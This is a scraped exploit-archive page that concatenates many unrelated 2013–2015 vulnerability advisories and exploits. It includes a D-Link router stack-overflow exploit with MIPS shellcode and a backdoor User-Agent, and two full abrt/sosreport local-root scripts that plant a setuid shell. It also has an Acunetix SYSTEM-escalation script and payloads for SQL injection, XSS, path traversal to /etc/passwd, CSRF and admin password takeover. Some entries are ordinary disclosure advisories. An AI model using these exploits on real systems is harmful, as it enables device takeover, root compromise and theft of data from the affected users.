HireHackking

source: https://www.securityfocus.com/bid/63234/info Multiple Vendors are prone to a stack-based buffer-overflow vulnerability. Exploiting this vulnerability may allow attackers to execute arbitrary code in the context of the affected devices. The following are vulnerable: D-Link DIR-120 D-Link DI-624S D-Link DI-524UP D-Link DI-604S D-Link DI-604UP D-Link DI-604 D-Link DIR-100 D-Link TM-G5240 PLANEX COMMUNICATIONS BRL-04UR PLANEX COMMUNICATIONS BRL-04R PLANEX COMMUNICATIONS BRL-04CW import sys import urllib2 try: url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1] except Exception, e: print str(e) print 'Usage: %s <target ip>' % sys.argv[0] sys.exit(1) # This is the actual payload; here it is a simple reboot shellcode. # This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs. payload = "\x3c\x06\x43\x21" # lui a2,0x4321 payload += "\x34\xc6\xfe\xdc" # ori a2,a2,0xfedc payload += "\x3c\x05\x28\x12" # lui a1,0x2812 payload += "\x34\xa5\x19\x69" # ori a1,a1,0x1969 payload += "\x3c\x04\xfe\xe1" # lui a0,0xfee1 payload += "\x34\x84\xde\xad" # ori a0,a0,0xdead payload += "\x24\x02\x0f\xf8" # li v0,4088 payload += "\x01\x01\x01\x0c" # syscall 0x40404 # The payload is split up; some of it before the return address on the stack, some after. # This little snippet skips over the return address during execution. # It assumes that your shellcode will not be using the $fp or $t9 registers. move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp jump_code = "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724 jump_code += "\x03\x21\xf8\x08" # jr $t9 jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102 # Stitch together the payload chunk(s) and jump_code snippet shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD" if len(shellcode_p1) < 86: shellcode_p1 += "D" * (86 - len(shellcode_p1)) shellcode_p2 = "" else: shellcode_p2 = "DD" + payload[68:] # Build the overflow buffer, with the return address and shellcode # libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13 # libc_base = 0x2aaee000 # ret_offset = 0x3243C buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2 # Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'}) urllib2.urlopen(req)

source: https://www.securityfocus.com/bid/63259/info DELL Quest One Password Manager is prone to a security bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and gain access to sensitive areas of the application to perform unauthorized actions; this may aid in launching further attacks. ScenarioActionId=42696720-7368-6974-2070-726F64756374&UserName=domain%5Cuser&Search=false

=== LSE Leading Security Experts GmbH - Security Advisory 2015-10-14 === HumHub - SQL-Injection ------------------------------------------------------------------------ Tested Versions =============== HumHub 0.11.2 and 0.20.0-beta.2 Issue Overview ============== Vulnerability Type: 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Technical Risk: high Likelihood of Exploitation: high Vendor: HumHub GmbH & Co. KG Vendor URL: https://www.humhub.org Credits: LSE Leading Security Experts GmbH employee Eric Sesterhenn Advisory URL: https://www.lsexperts.de/advisories/lse-2015-10-14.txt Advisory Status: Public CVE-Number: ---- CVE URL: --- Impact ====== Enables to read and modify the HumHub Mysql Database. Issue Description ================= While conducting an internal software evaluation, LSE Leading Security Experts GmbH discovered that the humhub social networking software is subject to an sql-injection attack. Temporary Workaround and Fix ============================ LSE Leading Security Experts GmbH advises to block access to the humhub software until the vendor provides a patch. Proof of Concept ================ Opening the following URL http://localhost/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5%27%22&mode=normal shows the SQL-error, which is easily exploitable using sqlmap. ./sqlmap.py -u 'http://localhost:9933/humhub/humhub-0.11.2/index.php?r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5&mode=normal' --cookie='pm_getting-started-panel=expanded; pm_new-people-panel=expanded; pm_user-statistics-panel=expanded; pm_new-spaces-panel=expanded; pm_spaces-statistics-panel=expanded; sin=f9vou17vnik100rrr5b26v8ip3; CSRF_TOKEN=d94129bfdd49e5d2c628928228519cd6b2c9cf54' --level=2 --risk=2 -p from -a ... --- Parameter: from (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=-4670 OR 5804=5804#&mode=normal Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT 7208 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=normal Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5;(SELECT * FROM (SELECT(SLEEP(5)))OXGN)#&mode=normal Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: r=directory/directory/stream&limit=4&filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT * FROM (SELECT(SLEEP(5)))nBYr)&mode=normal --- History ======= 2015-10-14 Issue discovered 2015-10-15 Vendor contacted 2015-10-15 Vendor response and hotfix 2015-10-20 Vendor releases fixed versions 2015-11-30 Advisory release GPG Signature ============= This advisory is signed with the GPG key of the LSE Leading Security Experts GmbH advisories team. The key can be downloaded here: https://www.lsexperts.de/advisories-key-99E3277C.asc

###################### # Exploit Title : MyCustomers Cms Sql Injection Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.iran-php.com/ # Google Dork : "Powered By IranPHP" & inurl:/index.php?DPT=IP17 & "Powered+by+MyCustomers-1.3.873" # Date: 2015/11/28 # Version : 1.3 # ###################### # Vulnerable Paramter DPT= # Demo: # http://server/index.php?DPT=IP17%27 # # Youtube : https://www.youtube.com/watch?v=43DVOq5L2hw # # We reported to vendor but Anyone not responsive # It's not joke # We do not take responsibility # ###################### # Discovered by : # Mojtaba MobhaM & T3NZOG4N (t3nz0g4n@yahoo.com) ######################

# Exploit Title: arbitrary file access kodi web interface # Shodan dork: title:kodi # Date: 25-11-2015 # Contact: https://twitter.com/mpronk89 # Software Link: http://kodi.tv/ # Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305 # Version: v15 # Tested on: linux # CVE : n/a kodi web interface vulnerable to arbitrary file read. example: <ip>:<port:/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd for passwd (issue fixed in 2012, reintroduced in february 2015. Fixed again november 2015 for v16)

#!/usr/bin/python # CVE-2015-5287 (?) # abrt/sosreport RHEL 7.0/7.1 local root # rebel 09/2015 # [user@localhost ~]$ python sosreport-rhel7.py # crashing pid 19143 # waiting for dump directory # dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143 # waiting for sosreport directory # sosreport: sosreport-localhost.localdomain-20151130194114 # waiting for tmpfiles # tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ'] # moving directory # moving tmpfiles # tmpurfpyY -> tmpurfpyY.old # tmpYnCfnQ -> tmpYnCfnQ.old # waiting for sosreport to finish (can take several minutes)........................................done # success # bash-4.2# id # uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 # bash-4.2# cat /etc/redhat-release # Red Hat Enterprise Linux Server release 7.1 (Maipo) import os,sys,glob,time,sys,socket payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n" pid = os.fork() if pid == 0: os.execl("/usr/bin/sleep","sleep","100") time.sleep(0.5) print "crashing pid %d" % pid os.kill(pid,11) print "waiting for dump directory" def waitpath(p): while 1: r = glob.glob(p) if len(r) > 0: return r time.sleep(0.05) dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0] print "dump directory: ", dumpdir os.chdir(dumpdir) print "waiting for sosreport directory" sosreport = waitpath("sosreport-*")[0] print "sosreport: ", sosreport print "waiting for tmpfiles" tmpfiles = waitpath("tmp*") print "tmpfiles: ", tmpfiles print "moving directory" os.rename(sosreport, sosreport + ".old") os.mkdir(sosreport) os.chmod(sosreport,0777) os.mkdir(sosreport + "/sos_logs") os.chmod(sosreport + "/sos_logs",0777) os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log") os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log") print "moving tmpfiles" for x in tmpfiles: print "%s -> %s" % (x,x + ".old") os.rename(x, x + ".old") open(x, "w+").write("/tmp/hax.sh\n") os.chmod(x,0666) os.chdir("/") sys.stderr.write("waiting for sosreport to finish (can take several minutes)..") def trigger(): open("/tmp/hax.sh","w+").write(payload) os.chmod("/tmp/hax.sh",0755) try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132) except: pass time.sleep(0.5) try: os.stat("/tmp/sh") except: print "could not create suid" sys.exit(-1) print "success" os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''') sys.exit(-1) for x in xrange(0,60*10): if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read(): print "done" trigger() time.sleep(1) sys.stderr.write(".") print "timed out"

#!/usr/bin/python # CVE-2015-5273 + CVE-2015-5287 # CENTOS 7.1/Fedora22 local root (probably works on SL and older versions too) # abrt-hook-ccpp insecure open() usage + abrt-action-install-debuginfo insecure temp directory usage # rebel 09/2015 # ---------------------------------------- # [user@localhost ~]$ id # uid=1000(user) gid=1000(user) groups=1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 # [user@localhost ~]$ cat /etc/redhat-release # CentOS Linux release 7.1.1503 (Core) # [user@localhost ~]$ python abrt-centos-fedora.py # -- lots of boring output, might take a while on a slow connection -- # /var/spool/abrt/abrt-hax-coredump created # executing crashing process.. # success # bash-4.2# id # uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 import time,os,datetime,sys,resource,socket fedora = "Fedora" in open("/etc/redhat-release").read() # mkdir dir1 # ln -s /var/spool/abrt dir1/hax # mkdir dir2 # mkdir dir2/hax # ln -s /proc/sys/kernel/modprobe dir2/hax/abrt-hax-coredump # cd dir1 # find . -depth -print | cpio -o > ../cpio1 # cd ../dir2 # find . -depth -print | cpio -o > ../cpio2 cpio1 = 'x\x9c;^\xc8\xcc\xa1\xb0\xef\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc\xc8\x02\xa4\xf9\x192\x12+\x18\xf4\xcb\x12\x8b\xf4\x8b\x0b\xf2\xf3s\xf4\x13\x93\x8aJ\x18\x8e\x03U\xb3\xef\xfb\xeb\x08R\xcd\x04U\r\xa2\x19\x18\xf4\x80r\x0cp\xc0\x08\xa5\xb9\xc1dH\x90\xa3\xa7\x8fk\x90\xa2\xa2"\xc3(\x18d\x00\x00\x16\xb9\x1bA'.decode("zip") cpio2 = 'x\x9c;^\xc8\xcc\x917\xfb\xff\xc2\x17\xcc/\x98\x19\x19\x18\x18>\x86\xde\xdc(\x06\xa4%\x192\x12+\xf4\x13\x93\x8aJt\x81\x0c\xdd\xe4\xfc\xa2\xd4\x94\xd2\xdc\x02\x06\xfd\x82\xa2\xfcd\xfd\xe2\xcab\xfd\xec\xd4\xa2\xbc\xd4\x1c\xfd\xdc\xfc\x14\xa0PR*\xc3q\xa0I\x19\xb3\xff:\x82Lb\x82\x9a\xc4\xc2\x00\x02@\x03\xc0\xb2+\xef@d\x99\xa1\xb2L`Y=\xa0\x1c\x03\x1c0Bin0\x19\x12\xe4\xe8\xe9\xe3\x1a\xa4\xa8\xa8\xc80\nh\x02\x00\x01\x980\x88'.decode("zip") if fedora: cpio1 = cpio1.replace("/var/spool/abrt","/var/tmp///abrt") payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n" # we use a 32 bit binary because [vsyscall] will be at the end of the coredump on 64 bit binaries # and we can't control the contents of that region. on 32 bit binaries [stack] is at the end # the crashing binary will just fill the stack with /tmp/hax.sh which subsequently gets written # to /proc/sys/kernel/modprobe by /usr/libexec/abrt-hook-ccpp elf = 'x\x9c\xabw\xf5qcddd\x80\x01&\x06f\x06\x10/\xa4\x81\x85\xc3\x84\x01\x01L\x18\x14\x18`\xaa\xe0\xaa\x81j@x1\x90\t\xc2\xac 1\x01\x06\x06\x97F\x1b\x15\xfd\x92\xdc\x82\xd2o\x8dg\xfe\xf3\x03\xf9\xbb\xbe\x00\xb5\xec\x14\x01\xca\xee\xee\x07\xaa\xd7<\xd3\xc5\xdc\xc1\xa2\xe2\xe2\xfc\xe8{\xf3\x1b\x11\xaf\xe6_\x0c\xa5\x8fv8\x02\xc1\xff\x07\xfaP\x00\xd4\xad\x9f\x91X\xa1W\x9c\xc1\xc5\x00\x00-f"X'.decode("zip") # most people don't have nasm installed so i preassembled it # if you're not brave enough to run the preassembled file, here's the code :) """ ; abrt-hax.asm ; nasm -f bin -o abrt-hax abrt-hax.asm BITS 32 org 0x08048000 ehdr: ; Elf32_Ehdr db 0x7F, "ELF", 1, 1, 1, 0 ; e_ident times 8 db 0 dw 2 ; e_type dw 3 ; e_machine dd 1 ; e_version dd _start ; e_entry dd phdr - $$ ; e_phoff dd 0 ; e_shoff dd 0 ; e_flags dw ehdrsize ; e_ehsize dw phdrsize ; e_phentsize dw 1 ; e_phnum dw 0 ; e_shentsize dw 0 ; e_shnum dw 0 ; e_shstrndx ehdrsize equ $ - ehdr phdr: ; Elf32_Phdr dd 1 ; p_type dd 0 ; p_offset dd $$ ; p_vaddr dd $$ ; p_paddr dd filesize ; p_filesz dd filesize ; p_memsz dd 5 ; p_flags dd 0x1000 ; p_align phdrsize equ $ - phdr _start: inc esp cmp dword [esp],0x706d742f jne l or esp,0xfff inc esp mov edx,500 l3: mov ecx,msglen mov ebx,message sub esp,ecx l2: mov al,[ebx] mov [esp],al inc esp inc ebx loop l2 sub esp,msglen dec edx cmp edx,0 jne l3 mov eax,0x41414141 jmp eax message db '////////tmp/hax.sh',0x0a,0 msglen equ $-message """ build_id = os.popen("eu-readelf -n /usr/bin/hostname").readlines()[-1].split()[-1] os.chdir("/tmp") open("build_ids","w+").write(build_id + "\n") print build_id def child(): timestamp = int(time.time()) for i in xrange(0,3): try: t = datetime.datetime.fromtimestamp(timestamp+i) d = "/var/tmp/abrt-tmp-debuginfo-%s.%u" % (t.strftime("%Y-%m-%d-%H:%M:%S"), os.getpid()) os.mkdir(d) os.chmod(d,0777) os.symlink("/var/tmp/haxfifo",d+"/unpacked.cpio") print "created %s" % d except: pass os.execl("/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache","abrt-action-install-debuginfo-to-abrt-cache","-y") try: os.mkfifo("/var/tmp/haxfifo") os.chmod("/var/tmp/haxfifo",0666) except: pass def fifo(a): print "reading from fifo.." open("/var/tmp/haxfifo").read() print "done" print "writing to fifo.." open("/var/tmp/haxfifo","w+").write(a) print "done" if os.fork() == 0: child() print "first cpio..." fifo(cpio1) os.wait() time.sleep(1) if os.fork() == 0: child() print "second cpio..." fifo(cpio2) os.wait() time.sleep(1) if fedora: sym = "/var/tmp/abrt/abrt-hax-coredump" else: sym = "/var/spool/abrt/abrt-hax-coredump" try: os.lstat(sym) except: print "could not create symlink" sys.exit(-1) print "%s created" % sym open("/tmp/abrt-hax","w+").write(elf) os.chmod("/tmp/abrt-hax",0755) if os.fork() == 0: resource.setrlimit(resource.RLIMIT_CORE,(resource.RLIM_INFINITY,resource.RLIM_INFINITY,)) print "executing crashing process.." os.execle("/tmp/abrt-hax","",{}) os.wait() time.sleep(1) if "/tmp/hax" not in open("/proc/sys/kernel/modprobe").read(): print "could not modify /proc/sys/kernel/modprobe" sys.exit(-1) open("/tmp/hax.sh","w+").write(payload) os.chmod("/tmp/hax.sh",0755) try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132) except: pass time.sleep(0.5) try: os.stat("/tmp/sh") except: print "could not create suid" sys.exit(-1) print "success" os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;rm -rf /var/cache/abrt-di/hax;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')

# Exploit Title: IP.Board Persistent XSS Vulnerability # Date: 29/10/2015 # Software Link: https://www.invisionpower.com/buy # Software version : 4.1.4.x # Exploit Author: Mehdi Alouache # Contact: mehdi.alouache@etu.univ-lehavre.fr # Category: webapps 1. Description Any registered user can execute remote javascript code by sending a private message to another user. The malicious JS code has to be written in the title of the message, and the receiver must have enabled the notifications when a new message is delivered. Note that the code will be directly executed as soon as the notification appear. (The receiver doesn't even need to check his inbox). 2. Proof of Concept Register on the forum (IP.Board) of a website as a regular user, and send a message to any user having the message notifications enabled. In the title field (and only here), a simple <script>alert(1)</script> will show a dialog box to the victim. 3. Solution: Patch the vulnerability with the (incoming) associated patch. -- ALOUACHE Mehdi Departement informatique Groupe A mehdi.alouache@hotmail.fr mehdi.alouache@etu.univ-lehavre.fr

# Vulnerability title: ntop-ng <= 2.0.151021 - Privilege Escalation # Author: Dolev Farhi # Contact: dolev at flaresec.com # Vulnerable version: 2.0.151021 # Fixed version: 2.2 # Link: ntop.org # Date 27.11.2015 # CVE-2015-8368 # Product Details: ntopng is the next generation version of the original ntop, a network traffic probe that shows the network usage, similar to what the popular top Unix command does. ntopng is based on libpcap and it has been written in a portable way in order to virtually run on every Unix platform, MacOSX and on Windows as well. # Vulnerability Details: in the latest stable release of ntop-ng it is possible to escalate the privileges of a non-privileged user to the admin account by resetting the password, intercepting the request and replacing the HTTP parameters. # Vulnerability Proof of concept 1. Login with an unprivileged account 2. Change the account password and intercept the request, modify the username= and Cookie user= and change to the admin account Example: GET /lua/admin/password_reset.lua?csrf=XXXXXXXXXXXXXXXXXX&username=admin&old_password=12345&new_password=123456&confirm_new_password=123456 HTTP/1.1 Cookie: user=admin; session=XXXXXXXXXXXXXXXXXXXXXXXXX 3. Login with the admin account and the password you defined in step #3. Voila! you're an administrator.

##Full Disclosure: #Exploit Title : Belkin N150 Wireless Home Router Multiple Vulnerabilities #Exploit Author : Rahul Pratap Singh #Date : 30/Nov/2015 #Home Page Link : http://www.belkin.com #Blog Url : 0x62626262.wordpress.com #Linkedin : https://in.linkedin.com/in/rahulpratapsingh94 #Status : Not Patched → Vulnerability/BUG Report : 1) • Vulnerability Title : HTML/Script Injection • Version : F9K1009 v1 • Firmware : 1.00.09 → Proof of Concept: "InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" this parameter is vulnerable. https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/ → Steps to Reproduce: Send the following post request using Burpsuite,etc POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=- Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 260 %3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D 2) • Vulnerability Title : Session Hijacking • Version : F9K1009 v1 • Firmware : 1.00.09 → Proof of Concept: Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT sessionid is allocated using hex encoding and of fixed length i.e 8 . Therefore, it is very easy to bruteforce it in feasible amount for time as this session id ranges from 00000000 to ffffffff → Steps to Reproduce: Send the following request using Burpsuite and Bruteforce the sessionid. POST /cgi-bin/webproc HTTP/1.1 Host: 192.168.2.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=- Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT 3) • Vulnerability Title : Telnet Enabled with Default Pass • Version : F9K1009 v1 • Firmware : 1.00.09 → Vulnerability Details: Telnet protocol can be used by an attacker to gain remote access to the router with root privileges. → Proof of Concept: https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/ → Steps to Reproduce: 1) Open terminal 2) Type following command: telnet 192.168.2.1 3) Default user and pass is root:root 4) • Vulnerability Title : Cross Site Request Forgery • Version : F9K1009 v1 • Firmware : 1.00.09 → Proof of Concept: Request doesn't contain any CSRF-token. Therefore, requests can be forged. It can be verified with any request. Status: Vendor Notified: 20 Oct 2015 Vendor Notified Again: 25 Nov 2015 No Response. Full Disclosure: 30 Nov 2015 Ref: https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ZEN-PHOTO-1.4.10-LFI.txt Vendor: ==================== www.zenphoto.org Product: =================== Zenphoto 1.4.10 Vulnerability Type: ======================== Local File Inclusion CVE Reference: ============== N/A Vulnerability Details: ====================== Zen Photos pluginDoc.php PHP file is vulnerable to local file inclusion that allows attackers to read arbitrary server files outside of the current web directory by injecting "../" directory traversal characters, which can lead to sensitive information disclosure, code execution or DOS on the victims web server. Local File Inclusion Codes: ========================== http://localhost/zenphoto-zenphoto-1.4.10/zp-core/pluginDoc.php?thirdparty=1&extension=../../../xampp/phpinfo Disclosure Timeline: ===================== Vendor Notification: November 10, 2015 December 1, 2015 : Public Disclosure Exploitation Technique: ======================= Local Severity Level: ================ High Description: ===================================================== Request Method(s): [+] GET Vulnerable Product: [+] Zenphoto 1.4.10 Vulnerable Parameter(s): [+] extension [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx

source: https://www.securityfocus.com/bid/63773/info Testa OTMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database. Testa OTMS 2.0.0.2 is vulnerable; other version may also be vulnerable. http://www.example.com /?test_id=-1%27+union+select+1,group_concat%28id,0x3a,0x3a,admin_id,0x3a,0x3a,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+settings--+ http://www.example.com/test/admin/index.php

source: https://www.securityfocus.com/bid/63800/info The Blue Wrench Video Widget plugin for WordPress is prone to a cross-site request-forgery vulnerability. An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks. Blue Wrench Video Widget 1.0.2 is vulnerable; other versions may also be affected. <form id=.upload-form. action=.http://www.example1.com/wordpress/wp-admin/admin.php?page=bw-videos. method=.post.> <table class=.form-table.> <tbody> <tr valign=.top.> <th scope=.row.>Title</th> <td><input id=.bw_title. type=.text. maxlength=.75. name=.bw_title. size=.70. value=.http://www.example2.com/code/evil.js. /> </tr> <tr valign=.top .> <th scope=.row.>URL</th> <td><input id=.bw_url. type=.text. maxlength=.75. name=.bw_url. size=.70. value=.http://www.example2.com/code/evil.js. /> </td> </tr> </tbody> </table> </form>

source: https://www.securityfocus.com/bid/63795/info TomatoCart is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible. TomatoCart 1.1.8.2 is vulnerable; other versions may also be affected. http://www.example.com//install/rpc.php?action=dbCheck&class=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg

source: https://www.securityfocus.com/bid/63805/info SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities. Attackers can exploit these issues to execute arbitrary commands in the context of the affected system. SKIDATA Freemotion.Gate 4.1.3.5 is vulnerable; other versions may also be affected. curl -X POST --header "Content-Type:text/xml" --data-binary @manual-release.raw http://www.example.com:7777/skidata/hessian/CP > /dev/null 2>&1

''' ======================================================================== Acunetix WVS 10 - from guest to Sytem (Local privilege escalation) CVE: CVE-2015-4027 Author: (me) Daniele Linguaglossa Affected Product: Acunetix WVS 10 Exploit: Local privilege escalation Vendor: Acunetix ltd Remote: No Version: 10 ========================================================================= A local privilege escalation exists in Acunetix WVS 10, it allow a local user (even guest) to gain same privilege as System user. With default Acunetix installation, a service called "AcuWVSSchedulerv10" will be installed, this service run as local system user. AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction it expose some API to interact via a web server usually localhost:8183. API: /listScan /addScan <== vulnerable one /deleteScan etc... When a user schedule a scan API "addScan" will be called as following ------------------------------------------------------------------------------- POST /api/addScan HTTP/1.1 Host: localhost:8183 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/json; charset=UTF-8 RequestValidated: true X-Requested-With: XMLHttpRequest Referer: http://localhost:8183/ Content-Length: 452 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache { "scanType": "scan", "targetList": "", "target": ["http://.target.it"], "recurse": "-1", "date": "12/2/2015", "dayOfWeek": "1", "dayOfMonth": "1", "time": "12:21", "deleteAfterCompletion": "False", "params": { "profile": "Default", "loginSeq": "<none>", "settings": "Default", "scanningmode": "heuristic", "excludedhours": "<none>", "savetodatabase": "True", "savelogs": "False", "generatereport": "False", "reportformat": "PDF", "reporttemplate": "WVSAffectedItemsReport.rep", "emailaddress": "" } } ------------------------------------------------------------------------------ The first thing i noticed was the reporttemplate, this was used to create report when scanning ends, so it means an external file wich we can control will be then used by System! this would be interesting enough but i never look deep into. Instead i noticed something even worst, filename was used as argument to wvs.exe called with system privilege! By looking at how Acunetix handled reporttemplate argument i figured out that was possibile to inject custom arguments within reporttemplate, now this is where Acunetix help us :D in fact wvs was provided with an interesting argument it was /Run as reference says: https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/ Run a command line command during the crawl. Syntax: /Run [command] Example: /Run curl http://example.com/dir1/ Wow that's really nice, so in order to execute a command we must insert a fake Crawl followed by a Run command so reporttemplate become: "reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe" it worked cmd runned as System! ================================================================================== Now let's pwn this! escalation.py ''' import httplib import json from datetime import datetime import sys from time import gmtime, strftime COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe" ACUHOST = '127.0.0.1' ACUPORT = 8183 ACUHEADERS = { "Content-Type": "application/json; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Accept": "application/json, text/javascript, */*; q=0.01", "RequestValidated": "true" } ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\"" ACUDATA = {"scanType":"scan", "targetList":"", "target":["http://"+"A"*2048], "recurse":"-1", "date":strftime("%m/%d/%Y", gmtime()), "dayOfWeek":"1", "dayOfMonth":"1", "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1), "deleteAfterCompletion":"False", "params":{"profile":"Default", "loginSeq":"<none>", "settings":"Default", "scanningmode":"heuristic", "excludedhours":"<none>", "savetodatabase":"True", "savelogs":"False", "generatereport":"False", "reportformat":"PDF", "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT, "emailaddress":""} } def sendExploit(): conn = httplib.HTTPConnection(ACUHOST, ACUPORT) conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS) resp = conn.getresponse() return "%s %s" % (resp.status, resp.reason) print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n" print "[+] Command : %s will be executed as SYSTEM" % COMMAND print "[+] Sending exploit..." print "[+] Result: "+sendExploit() print "[+] Done!" ''' ============================================================================ I hope this write-up was funny enough anyway i really would like to thank Acunetix product manager N.S. for the really fast answer and bug mitigation, right now a patch exists so hurry up download it now. ============================================================================ '''

source: https://www.securityfocus.com/bid/63814/info nginx is prone to a remote security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. nginx 0.8.41 through 1.5.6 are vulnerable. The following example data is available: /file \0.php

